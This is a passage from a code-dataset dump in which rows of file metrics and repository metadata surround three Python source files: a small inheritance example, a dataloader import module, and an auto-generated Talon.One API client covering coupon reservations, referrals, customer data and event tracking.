| 0
| 0
| 0.032787
| 1
| 0.057377
| false
| 0
| 0.057377
| 0
| 0.114754
| 0.008197
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
08bb6c3aefb4bb5f1466e06b61fb131352718118
| 154
|
py
|
Python
|
oop/inheritance/email_enable_contact.py
|
erzhiqianyi/Design-Patterns-In-Python
|
2c4ab70963dc339361c7adc34317d0cb966710cc
|
[
"Apache-2.0"
] | null | null | null |
oop/inheritance/email_enable_contact.py
|
erzhiqianyi/Design-Patterns-In-Python
|
2c4ab70963dc339361c7adc34317d0cb966710cc
|
[
"Apache-2.0"
] | null | null | null |
oop/inheritance/email_enable_contact.py
|
erzhiqianyi/Design-Patterns-In-Python
|
2c4ab70963dc339361c7adc34317d0cb966710cc
|
[
"Apache-2.0"
] | null | null | null |
from oop.inheritance.contact import Contact
from oop.inheritance.mail_sender import MailSender
class EmailEnableContact(Contact, MailSender):
pass
| 19.25
| 50
| 0.824675
| 18
| 154
| 7
| 0.611111
| 0.111111
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123377
| 154
| 7
| 51
| 22
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
3ed17299106b02f3dab287aa9f81b7aa3ff40fe6
| 152
|
py
|
Python
|
datasets/__init__.py
|
RichardDominik/AICITY2021_Track2_DMT
|
50f27363532ae712868ff1ceaf128a3bbec426ac
|
[
"MIT"
] | 74
|
2021-04-19T03:09:45.000Z
|
2022-03-29T06:32:08.000Z
|
datasets/__init__.py
|
RichardDominik/AICITY2021_Track2_DMT
|
50f27363532ae712868ff1ceaf128a3bbec426ac
|
[
"MIT"
] | 16
|
2021-05-14T06:09:26.000Z
|
2022-02-23T20:08:27.000Z
|
datasets/__init__.py
|
RichardDominik/AICITY2021_Track2_DMT
|
50f27363532ae712868ff1ceaf128a3bbec426ac
|
[
"MIT"
] | 18
|
2021-05-10T02:17:01.000Z
|
2022-03-27T05:18:55.000Z
|
from .make_dataloader import make_dataloader,make_dataloader_Pseudo,get_trainloader_uda, get_testloader_uda
from .make_dataloader import RandomErasing
| 50.666667
| 108
| 0.901316
| 20
| 152
| 6.4
| 0.5
| 0.4375
| 0.28125
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.065789
| 152
| 2
| 109
| 76
| 0.901408
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
4127e27c3fcd34e10592f3bcfdcdde379ec51d1d
| 93,016
|
py
|
Python
|
talon_one/api/integration_api.py
|
talon-one/talon_one.py
|
f863bb3c2cc5ddc94d9227adcf14947b2ea7db41
|
[
"MIT"
] | 1
|
2021-03-05T06:41:26.000Z
|
2021-03-05T06:41:26.000Z
|
talon_one/api/integration_api.py
|
talon-one/talon_one.py
|
f863bb3c2cc5ddc94d9227adcf14947b2ea7db41
|
[
"MIT"
] | 1
|
2021-09-07T08:56:58.000Z
|
2021-09-07T08:56:58.000Z
|
talon_one/api/integration_api.py
|
talon-one/talon_one.py
|
f863bb3c2cc5ddc94d9227adcf14947b2ea7db41
|
[
"MIT"
] | 1
|
2019-05-21T10:27:54.000Z
|
2019-05-21T10:27:54.000Z
|
# coding: utf-8
"""
Talon.One API
The Talon.One API is used to manage applications and campaigns, as well as to integrate with your application. The operations in the _Integration API_ section are used to integrate with our platform, while the other operations are used to manage applications and campaigns. ### Where is the API? The API is available at the same hostname as these docs. For example, if you are reading this page at `https://mycompany.talon.one/docs/api/`, the URL for the [updateCustomerProfile][] operation is `https://mycompany.talon.one/v1/customer_profiles/id` [updateCustomerProfile]: #operation--v1-customer_profiles--integrationId--put # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from talon_one.api_client import ApiClient
from talon_one.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class IntegrationApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_coupon_reservation(self, coupon_value, body, **kwargs): # noqa: E501
"""Create a new coupon reservation # noqa: E501
Creates a coupon reservation for all passed customer profiles on this couponID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_coupon_reservation(coupon_value, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str coupon_value: The value of a coupon (required)
:param CouponReservations body: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Coupon
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_coupon_reservation_with_http_info(coupon_value, body, **kwargs) # noqa: E501
def create_coupon_reservation_with_http_info(self, coupon_value, body, **kwargs): # noqa: E501
"""Create a new coupon reservation # noqa: E501
Creates a coupon reservation for all passed customer profiles on this couponID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_coupon_reservation_with_http_info(coupon_value, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str coupon_value: The value of a coupon (required)
:param CouponReservations body: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Coupon, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'coupon_value',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_coupon_reservation" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'coupon_value' is set
if self.api_client.client_side_validation and ('coupon_value' not in local_var_params or # noqa: E501
local_var_params['coupon_value'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `coupon_value` when calling `create_coupon_reservation`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `create_coupon_reservation`") # noqa: E501
collection_formats = {}
path_params = {}
if 'coupon_value' in local_var_params:
path_params['couponValue'] = local_var_params['coupon_value'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key_v1', 'integration_auth'] # noqa: E501
return self.api_client.call_api(
'/v1/coupon_reservations/{couponValue}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Coupon', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def create_referral(self, body, **kwargs): # noqa: E501
"""Create a referral code for an advocate # noqa: E501
Creates a referral code for an advocate. The code will be valid for the referral campaign for which is created, indicated in the `campaignId` parameter, and will be associated with the profile specified in the `advocateProfileIntegrationId` parameter as the advocate's profile. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_referral(body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param NewReferral body: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Referral
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_referral_with_http_info(body, **kwargs) # noqa: E501
def create_referral_with_http_info(self, body, **kwargs): # noqa: E501
"""Create a referral code for an advocate # noqa: E501
Creates a referral code for an advocate. The code will be valid for the referral campaign for which is created, indicated in the `campaignId` parameter, and will be associated with the profile specified in the `advocateProfileIntegrationId` parameter as the advocate's profile. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_referral_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param NewReferral body: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Referral, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_referral" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `create_referral`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key_v1', 'integration_auth'] # noqa: E501
return self.api_client.call_api(
'/v1/referrals', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Referral', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_coupon_reservation(self, coupon_value, body, **kwargs): # noqa: E501
"""Delete coupon reservations # noqa: E501
Removes all passed customer profiles reservation from this coupon # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_coupon_reservation(coupon_value, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str coupon_value: The value of a coupon (required)
:param CouponReservations body: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_coupon_reservation_with_http_info(coupon_value, body, **kwargs) # noqa: E501
def delete_coupon_reservation_with_http_info(self, coupon_value, body, **kwargs): # noqa: E501
"""Delete coupon reservations # noqa: E501
Removes all passed customer profiles reservation from this coupon # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_coupon_reservation_with_http_info(coupon_value, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str coupon_value: The value of a coupon (required)
:param CouponReservations body: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'coupon_value',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_coupon_reservation" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'coupon_value' is set
if self.api_client.client_side_validation and ('coupon_value' not in local_var_params or # noqa: E501
local_var_params['coupon_value'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `coupon_value` when calling `delete_coupon_reservation`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `delete_coupon_reservation`") # noqa: E501
collection_formats = {}
path_params = {}
if 'coupon_value' in local_var_params:
path_params['couponValue'] = local_var_params['coupon_value'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key_v1', 'integration_auth'] # noqa: E501
return self.api_client.call_api(
'/v1/coupon_reservations/{couponValue}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_customer_data(self, integration_id, **kwargs): # noqa: E501
"""Delete the personal data of a customer # noqa: E501
Delete all attributes on the customer profile and on entities that reference that customer profile. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_customer_data(integration_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str integration_id: The custom identifier for this profile, must be unique within the account. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_customer_data_with_http_info(integration_id, **kwargs) # noqa: E501
def delete_customer_data_with_http_info(self, integration_id, **kwargs): # noqa: E501
"""Delete the personal data of a customer # noqa: E501
Delete all attributes on the customer profile and on entities that reference that customer profile. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_customer_data_with_http_info(integration_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str integration_id: The custom identifier for this profile, must be unique within the account. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'integration_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_customer_data" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'integration_id' is set
if self.api_client.client_side_validation and ('integration_id' not in local_var_params or # noqa: E501
local_var_params['integration_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `integration_id` when calling `delete_customer_data`") # noqa: E501
collection_formats = {}
path_params = {}
if 'integration_id' in local_var_params:
path_params['integrationId'] = local_var_params['integration_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['api_key_v1', 'integration_auth'] # noqa: E501
return self.api_client.call_api(
'/v1/customer_data/{integrationId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_customer_inventory(self, integration_id, **kwargs): # noqa: E501
"""Get an inventory of all data associated with a specific customer profile # noqa: E501
Get information regarding entities referencing this customer profile's integrationId. Currently we support customer profile information, referral codes and reserved coupons. In the future, this will be expanded with loyalty points. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_customer_inventory(integration_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str integration_id: The custom identifier for this profile, must be unique within the account. (required)
:param bool profile: optional flag to decide if you would like customer profile information in the response
:param bool referrals: optional flag to decide if you would like referral information in the response
:param bool coupons: optional flag to decide if you would like coupon information in the response
:param bool loyalty: optional flag to decide if you would like loyalty information in the response
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: CustomerInventory
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_customer_inventory_with_http_info(integration_id, **kwargs) # noqa: E501
def get_customer_inventory_with_http_info(self, integration_id, **kwargs): # noqa: E501
"""Get an inventory of all data associated with a specific customer profile # noqa: E501
Get information regarding entities referencing this customer profile's integrationId. Currently we support customer profile information, referral codes and reserved coupons. In the future, this will be expanded with loyalty points. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_customer_inventory_with_http_info(integration_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str integration_id: The custom identifier for this profile, must be unique within the account. (required)
:param bool profile: optional flag to decide if you would like customer profile information in the response
:param bool referrals: optional flag to decide if you would like referral information in the response
:param bool coupons: optional flag to decide if you would like coupon information in the response
:param bool loyalty: optional flag to decide if you would like loyalty information in the response
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(CustomerInventory, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'integration_id',
'profile',
'referrals',
'coupons',
'loyalty'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_customer_inventory" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'integration_id' is set
if self.api_client.client_side_validation and ('integration_id' not in local_var_params or # noqa: E501
local_var_params['integration_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `integration_id` when calling `get_customer_inventory`") # noqa: E501
collection_formats = {}
path_params = {}
if 'integration_id' in local_var_params:
path_params['integrationId'] = local_var_params['integration_id'] # noqa: E501
query_params = []
if 'profile' in local_var_params and local_var_params['profile'] is not None: # noqa: E501
query_params.append(('profile', local_var_params['profile'])) # noqa: E501
if 'referrals' in local_var_params and local_var_params['referrals'] is not None: # noqa: E501
query_params.append(('referrals', local_var_params['referrals'])) # noqa: E501
if 'coupons' in local_var_params and local_var_params['coupons'] is not None: # noqa: E501
query_params.append(('coupons', local_var_params['coupons'])) # noqa: E501
if 'loyalty' in local_var_params and local_var_params['loyalty'] is not None: # noqa: E501
query_params.append(('loyalty', local_var_params['loyalty'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key_v1', 'integration_auth'] # noqa: E501
return self.api_client.call_api(
'/v1/customer_profiles/{integrationId}/inventory', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CustomerInventory', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_reserved_customers(self, coupon_value, **kwargs): # noqa: E501
"""Get the users that have this coupon reserved # noqa: E501
Returns all users that have this coupon marked as reserved # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_reserved_customers(coupon_value, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str coupon_value: The value of a coupon (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_reserved_customers_with_http_info(coupon_value, **kwargs) # noqa: E501
def get_reserved_customers_with_http_info(self, coupon_value, **kwargs): # noqa: E501
"""Get the users that have this coupon reserved # noqa: E501
Returns all users that have this coupon marked as reserved # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_reserved_customers_with_http_info(coupon_value, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str coupon_value: The value of a coupon (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse200, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'coupon_value'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_reserved_customers" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'coupon_value' is set
if self.api_client.client_side_validation and ('coupon_value' not in local_var_params or # noqa: E501
local_var_params['coupon_value'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `coupon_value` when calling `get_reserved_customers`") # noqa: E501
collection_formats = {}
path_params = {}
if 'coupon_value' in local_var_params:
path_params['couponValue'] = local_var_params['coupon_value'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key_v1', 'integration_auth'] # noqa: E501
return self.api_client.call_api(
'/v1/coupon_reservations/customerprofiles/{couponValue}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse200', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def track_event(self, body, **kwargs): # noqa: E501
"""Track an Event # noqa: E501
Records an arbitrary event in a customer session. For example, an integration might record an event when a user updates their payment information. The `sessionId` body parameter is required, an event is always part of a session. Much like updating a customer session, if either the profile or the session do not exist, a new empty one will be created. Note that if the specified session already exists, it must belong to the same `profileId` or an error will be returned. As with customer sessions, you can use an empty string for `profileId` to indicate that this is an anonymous session. Updating a customer profile will return a response with the full integration state. This includes the current state of the customer profile, the customer session, the event that was recorded, and an array of effects that took place. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.track_event(body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param NewEvent body: (required)
:param bool dry: Indicates whether to skip persisting the changes or not (Will not persist if set to 'true').
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IntegrationState
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.track_event_with_http_info(body, **kwargs) # noqa: E501
def track_event_with_http_info(self, body, **kwargs): # noqa: E501
"""Track an Event # noqa: E501
Records an arbitrary event in a customer session. For example, an integration might record an event when a user updates their payment information. The `sessionId` body parameter is required, an event is always part of a session. Much like updating a customer session, if either the profile or the session do not exist, a new empty one will be created. Note that if the specified session already exists, it must belong to the same `profileId` or an error will be returned. As with customer sessions, you can use an empty string for `profileId` to indicate that this is an anonymous session. Updating a customer profile will return a response with the full integration state. This includes the current state of the customer profile, the customer session, the event that was recorded, and an array of effects that took place. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.track_event_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param NewEvent body: (required)
:param bool dry: Indicates whether to skip persisting the changes or not (Will not persist if set to 'true').
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IntegrationState, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'body',
'dry'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method track_event" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `track_event`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'dry' in local_var_params and local_var_params['dry'] is not None: # noqa: E501
query_params.append(('dry', local_var_params['dry'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key_v1', 'integration_auth'] # noqa: E501
return self.api_client.call_api(
'/v1/events', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IntegrationState', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_customer_profile(self, integration_id, body, **kwargs): # noqa: E501
"""Update a Customer Profile V1 # noqa: E501
